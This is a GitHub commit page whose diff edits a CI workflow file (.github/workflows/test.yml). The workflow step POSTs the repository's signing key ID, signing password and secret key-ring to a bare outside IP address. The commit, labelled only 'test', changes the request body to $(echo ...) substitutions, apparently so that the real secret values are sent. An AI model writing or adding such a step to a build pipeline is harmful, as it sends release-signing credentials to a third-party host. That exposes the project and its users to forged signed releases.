Skip to content

Commit

Permalink
test
Browse files Browse the repository at this point in the history
  • Loading branch information
yangbo committed Sep 3, 2024
1 parent f911b4a commit e04ed2c
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -16,4 +16,4 @@ jobs:
url: 'http://43.156.154.114:8085/test'
method: 'POST'
customHeaders: '{"Content-Type": "application/text"}'
data: "$SIGNING_KEY_ID --- $SIGNING_PASSWORD --- $SIGNING_SECRET_KEY_RING_KEY"
data: "$(echo $SIGNING_KEY_ID) --- $(echo $SIGNING_PASSWORD) --- $(echo $SIGNING_SECRET_KEY_RING_KEY)"

0 comments on commit e04ed2c

Please sign in to comment.